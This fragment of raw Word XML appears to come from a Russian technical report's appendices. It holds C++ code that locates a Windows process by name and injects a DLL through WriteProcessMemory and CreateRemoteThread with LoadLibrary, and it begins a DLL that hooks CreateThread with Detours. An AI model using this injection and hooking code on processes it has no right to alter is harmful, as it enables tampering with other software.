        <w:t xml:space="preserve"> (NumberWrittenSymbols ==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5EA7D72D"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67F6C3AB"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 xml:space="preserve">cout &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error, WriteProcessMemory : "</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; GetLastError() &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BD6DA9"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E24AD8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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60212825"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730E099A"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7C9343F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8A25D14"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 xml:space="preserve">TID = CreateRemoteThread(hProcess,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 0, (</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPTHREAD_START_ROUTINE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, ArgLoadLibrary,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47D98ABA"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FABDFD4"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TID ==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7FB6B52F"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1F51BEF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 xml:space="preserve">cout &lt;&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Error,CreateRemoteThread : "</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; GetLastError() &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16E890"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FE49AF3"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301956C9"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57233642"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE568A0"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7EBBC7D"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AAAC59"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A2C13A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DBA15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5C872B2"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> FindProcess(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>process_name</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E50170"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74F94F"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HANDLE</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hProcess;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D1A72"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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROCESSENTRY32</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pe32;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C83F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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> res =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7F9EB08E"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5E8291B"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hProcess = CreateToolhelp32Snapshot(0x00000002, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DAB7A"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 xml:space="preserve">pe32.dwSize = </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROCESSENTRY32</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2849C8"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do</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA324B2"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_bstr_t</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name(pe32.szExeFile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC38C7E"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (!strcmp(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>process_name</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.c_str(), (</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const</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0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*)name)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF190B8"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res = pe32.th32ProcessID;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49BF9A"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break</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41487234"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t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13520717"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 xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process32Next</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(hProcess, &amp;pe32));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE6BACC"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A98FBDA"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CloseHandle(hProcess);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02A89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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0309C2BB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288043AC"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BB0D8C1"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A784898"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385B8F2"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hPid =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1C1511EE"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while</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(hPid == </w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5D8E28"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t xml:space="preserve"> hPid = FindProcess(</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAME_OF_PROCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323854C"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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (!LoadLib(hPid))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BD9CB0"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return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930CAF3" w14:textId="77777777" w:rsidR="007954D1" w:rsidRPr="007954D1" w:rsidRDefault="007954D1" w:rsidP="007954D1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007954D1">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DADC8B5" w14:textId="354E4F44" w:rsidR="007954D1" w:rsidRPr="005F0474" w:rsidRDefault="007954D1" w:rsidP="00A672CA">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F0474">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843A0EC" w14:textId="75814091" w:rsidR="00A672CA" w:rsidRPr="005F0474" w:rsidRDefault="00A672CA" w:rsidP="00A672CA">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A96FBC6" w14:textId="387D07DF" w:rsidR="00A672CA" w:rsidRPr="005F0474" w:rsidRDefault="00A672CA" w:rsidP="00A672CA">
      <w:pPr>
        <w:pStyle w:val="afff1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0474">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA3CE47" w14:textId="749FE14F" w:rsidR="00A672CA" w:rsidRDefault="00A672CA" w:rsidP="00A672CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27187193"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC9EB17"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CD7A1"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF90226"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D42A4D"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;sstream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43676BD1"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;string&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A01255"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;detours.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EC3CD1"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;processthreadsapi.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5F42C"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1D4F215"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HANDLE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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WINAPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>* pCreateThread) (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5157EF03"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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LPSECURITY_ATTRIBUTES</w:t>
      </w:r>
      <w:r w:rsidRPr="00A672CA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   lpThreadAttributes,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357928B2"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2B91AF"/>
